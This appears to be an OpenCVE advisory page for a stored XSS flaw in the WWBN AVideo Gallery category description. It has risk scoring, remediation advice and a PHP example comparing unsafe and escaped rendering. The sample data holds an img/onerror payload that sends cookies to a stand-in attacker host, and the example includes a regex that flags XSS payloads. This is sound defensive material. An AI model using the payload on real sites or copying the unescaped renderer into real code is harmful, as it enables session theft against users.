Description
WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments.
Published: 2026-05-29
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

WWBN AVideo, an open source video platform, stores the content of a category description directly from user input and later renders it as raw HTML in the Gallery view. A user with permission to create or edit categories can therefore inject JavaScript that persists in the database and executes in the browser of every user who visits the affected Gallery page. This is a stored cross-site scripting vector: the script runs with the victim's session, so it can read what the page can read, perform actions as the victim, or redirect them to attacker-controlled content.

Affected Systems

AVideo versions 29.0 and older are affected. The vulnerable product is WWBN AVideo; any installation running these versions without a fix is exposed whenever accounts other than fully trusted administrators hold the right to create or edit Gallery categories.

Risk and Exploitability

The CVSS 3.1 base score is 5.4 (Medium), vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: the flaw is reachable over the network with low attack complexity, but the attacker needs an authenticated account with category-management privileges (PR:L) and a victim must view the affected Gallery page (UI:R). Scope is Changed because the vulnerable component is the server application while the impact lands in the victim's browser. No EPSS score is available and the vulnerability is not listed in the CISA KEV catalog; the SSVC assessment recorded in the history below rates Exploitation as "poc", Automatable as "no" and Technical Impact as "partial". Once the payload is stored it is rendered unchanged to every user who views the page, giving the attacker arbitrary client-side code execution in those users' sessions, for example to exfiltrate tokens or cookies or to perform actions with the victim's privileges.

Generated by OpenCVE AI on May 29, 2026 at 15:19 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to a release newer than 29.0 once the vendor publishes a fix. The description scopes the issue to 29.0 and earlier, but no fixed version or patch reference is recorded on this page yet, so confirm against the AVideo release notes or commit history before relying on an upgrade alone.
  • Until then, restrict the ability to create and edit categories to trusted administrators. The attacker must already hold that privilege (PR:L), so narrowing it removes the injection point.
  • If the field must accept user input, escape it at output time with context-appropriate encoding (in PHP, htmlspecialchars($description, ENT_QUOTES | ENT_HTML5, 'UTF-8')) rather than trusting stored data; if limited formatting is genuinely required, run the value through an allowlist HTML sanitizer before rendering. Note that htmlspecialchars encodes tags rather than removing them, which is the desired behaviour: the text is displayed literally and nothing executes. A Content-Security-Policy that blocks inline scripts adds defence in depth but is not a substitute for escaping.
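The pattern behind this CVE and its fix, as an added example in PHP (AVideo's language) that is not AVideo's own code: a minimal Gallery-style renderer echoing category_description as raw HTML, the same renderer with output escaping, and a triage helper for finding already-stored payloads. The function names, the $category array shape, the sample rows and the attacker.example payload are assumptions constructed for this illustration.

```php
<?php
// Added example, not AVideo's own code. Function names, the $category array shape and
// the sample rows (including the payload) are constructed for this illustration.
declare(strict_types=1);

// Vulnerable pattern: stored text is trusted and interpolated straight into markup.
// Anything a category editor saved, including <script> or on* handlers, reaches the
// browser of whoever views the Gallery page exactly as stored.
function renderCategoryUnsafe(array $category): string
{
    return '<div class="category">'
         . '<h3>' . $category['name'] . '</h3>'
         . '<p class="description">' . $category['category_description'] . '</p>'
         . '</div>';
}

// Hardened pattern: every untrusted value is HTML-escaped at output time for the HTML
// body context. ENT_QUOTES also encodes ' and " so the same helper is safe inside
// attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an
// empty string (which would silently blank the field); the explicit charset avoids
// mis-decoding multibyte input.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function renderCategorySafe(array $category): string
{
    return '<div class="category">'
         . '<h3>' . h($category['name']) . '</h3>'
         . '<p class="description">' . h($category['category_description']) . '</p>'
         . '</div>';
}

// Audit heuristic for existing data: rows whose description carries a script tag,
// an on*= event handler, a javascript: URL or an active embedding element deserve a
// look before and after patching. This is for triage only; it is not a sanitizer and
// must not be used to block input (a denylist like this is trivially bypassed).
function looksLikeXssPayload(string $description): bool
{
    $pattern = '/<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*(iframe|svg|img|object|embed)\b/i';
    return (bool) preg_match($pattern, $description);
}

// Constructed sample rows standing in for the categories table (assumed shape).
$categories = [
    ['id' => 1, 'name' => 'Tutorials',
     'category_description' => 'Screencasts & walkthroughs <b>for beginners</b>'],
    ['id' => 2, 'name' => 'News',
     'category_description' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'],
];

foreach ($categories as $cat) {
    echo "--- category {$cat['id']} ({$cat['name']}) ---\n";
    echo "unsafe:  " . renderCategoryUnsafe($cat) . "\n";
    echo "safe:    " . renderCategorySafe($cat) . "\n";
    echo "flagged: " . (looksLikeXssPayload($cat['category_description']) ? 'yes' : 'no') . "\n";
}
```

Run it with `php` from the command line: the unsafe renderer emits row 2's img/onerror handler verbatim, while the safe renderer prints the same bytes with `<`, `>`, `"` and `'` encoded, so the browser shows the tag as text. Row 1 illustrates the trade-off the last recommendation mentions: escaping also neutralises the legitimate `<b>` markup, which is the right default, and the case for an allowlist sanitizer only if formatted descriptions are a real requirement.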

Generated by OpenCVE AI on May 29, 2026 at 15:19 UTC.

Tracking


Advisories

No advisories yet.

History

Sat, 30 May 2026 03:30:00 +0000

Type    | Values Removed | Values Added
Metrics |                | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 29 May 2026 15:15:00 +0000

Type                | Values Removed | Values Added
First Time appeared |                | Wwbn; Wwbn avideo
Vendors & Products  |                | Wwbn; Wwbn avideo

Fri, 29 May 2026 13:45:00 +0000

Type        | Values Removed | Values Added
Description |                | WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments.
Title       |                | WWBN AVideo: Stored XSS via unescaped Gallery category description
Weaknesses  |                | CWE-79
References  |                |
Metrics     |                | cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-30T02:29:30.640Z

Reserved: 2026-05-19T21:18:20.403Z

Link: CVE-2026-47694

Vulnrichment

Updated: 2026-05-30T02:29:26.064Z

NVD

Status : Undergoing Analysis

Published: 2026-05-29T14:16:31.997

Modified: 2026-05-30T04:17:22.477

Link: CVE-2026-47694

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-29T15:30:04Z

Weaknesses